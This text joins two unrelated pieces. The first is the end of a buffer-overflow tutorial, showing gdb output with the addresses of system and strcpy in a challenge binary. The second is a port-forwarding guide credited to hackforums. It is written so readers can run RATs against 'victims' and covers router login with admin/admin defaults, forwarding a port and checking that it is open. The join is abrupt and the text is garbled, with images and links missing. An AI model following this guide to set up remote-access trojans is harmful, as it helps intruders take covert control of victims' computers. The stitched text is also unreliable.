Breakpoint 1 at 0x8048409
(gdb) r
Starting program: /home/hack/homepage/challenge/buf/./basic

Breakpoint 1, 0x8048409 in main ()
(gdb) p system
$1 = {} 0x40052460

(gdb) p strcpy
$5 = {char *(char *, char *)} 0x4006e880

* Backtrace the stack
(gdb) backtrace
(gdb) bt

#0 0x8048476 in main ()
#1 0x40031a5e in __libc_start_main () at ../sysdeps/generic/libc-start.c:93

This is the end of the paper. Have questions ? Mail me:
I can't write english very good. Sorry for my english. My URL is

Port Forwarding - The Complete Guide

The Following Tutorial Includes:
Part 1: Gathering Information
Part 2: Port Forwarding
Part 3: Useful Alternatives
Part 4: Port Testing

Before we begin please regard the following:

What is Port Forwarding?
There are a couple of concepts you need to know before you can understand port forwarding. I'm going to make a couple broad statements that are almost always true. For simplicity lets assume they are true for now.

1.) Every device on the internet has at least one ip address. The IP address is a number that is used to identify a device. For more information on ip addresses refer to our What is an IP Address page.

2.) Every IP address is divided up into many ports. When one computer sends data to another computer, it sends it from a port on an ip address to a port on an ip address. For more information on ports refer to our What is a Port page.

3.) A port can only be used by one program at a time.

How can we use Port forwarding?
Port forwarding can be used for many purposes. Such as gaming applications. However, we are going to use it for other programs. Port forwarding is essential for RAT's, so naturally it is a key for this for of black hatting. Without succesfully port forwarding you cannot run a rat. No matter which rat it is.

Part One: Gathering Information

What is My Router?
Knowing what router you are using is very important. For each router has a different format for it's setting's page. You will need to know your model number and the company that makes the router.


Linksys WRT54G3G
Linksys = The company

Linksys WRT54G3G
WRT54G3G = Model Number

What Port Do I Want to Forward?
Knowing which port is also important. Because, some ports are already in use, or are blocked on most computer's, including your victims. Such as port 80 and 25. Furthermore, without knowing which port to forward you cannot enter i into your RAT when you build a server.

What RAT am I Using?
You must know which RAT you are using so you know what port is best to use. This is not as important for portforwarding. But there is no point to port forward if you don't have a RAT.

Do I Have a Static Ip?
It is possible to port forward with a dynamic ip adress, but you would need to port forward every time you turn on your computer. A static ip address, however, will not change every time you restart your computer. To set up a Static Ip please referr to this guide.

Part Two: Port Forwarding

Step 1. Go into your command prompt via start menu/run/cmd.

Step 2. Type in: ip config
Rows of text will appear looking something like this:

Look for the Ip Address labeled "Default Gateway."

Step 3. Open up your web browser, and type in your "Default Gateway"
Address where you usually enter websites.

Step 4. A Pop up will show up asking for a username and password.
The Default Login Information is this:
Username: admin
Password: admin
If this does not work you will need to find out what was set.

Step 5. Log on and a new page with your Router settings should show up
It is different for each kind of router, but usually there is a tab
called either Applications & Gaming or Port Forwarding.

Step 6. Click on the tab, Applications & Gaming or Port Forwarding.

Step 7. It will ask you for this:
Application: (Just put the name of your RAT, doesnt matter)
Start Port: (The Port you wish to forward)
End Port: (The same Port you used for the the Start Port)
Protocol: (Both)
Ip Address: (Your default gateway + 00 if applicable)
Example: not

Step 8. Check: Enable or something similar to that and click Save

There You Go you have now succesfully Port Forwarded!

Part Three: Useful Alternatives

Method 1:
If you still cant portforward please visit this site for even more support right here. Otherwise, congratulations!

Method 2:
You can use Simple Port Forwarding Program by PCWinTech to easily port forward as well.

Download it here

We will be using the Port Forwarding Feature of this program:

Step 1. When you first open up the program two windows will
open up. Click on the option boxed in red below:

Step 2. Then another window will show up. Click Add Custom.

Step 3. The new window will show a few blank fields. Fill in what
you need:

Step 4. Click Add.

There you go you have succesfully port forwarded using a program!

Part Four: Port Testing

Method 1

Go to: CanYouSeeMe?
Type in the port you forwarded and click check.
It will tell you if you have port forwarded correctly.

Note: It will only say it worked if no program is already using that port.

Method 2

Download Port Checker from here
Type in your port and let it check it for you. You will also need to make sure no other program is using it at the moment.

refrence: hackforums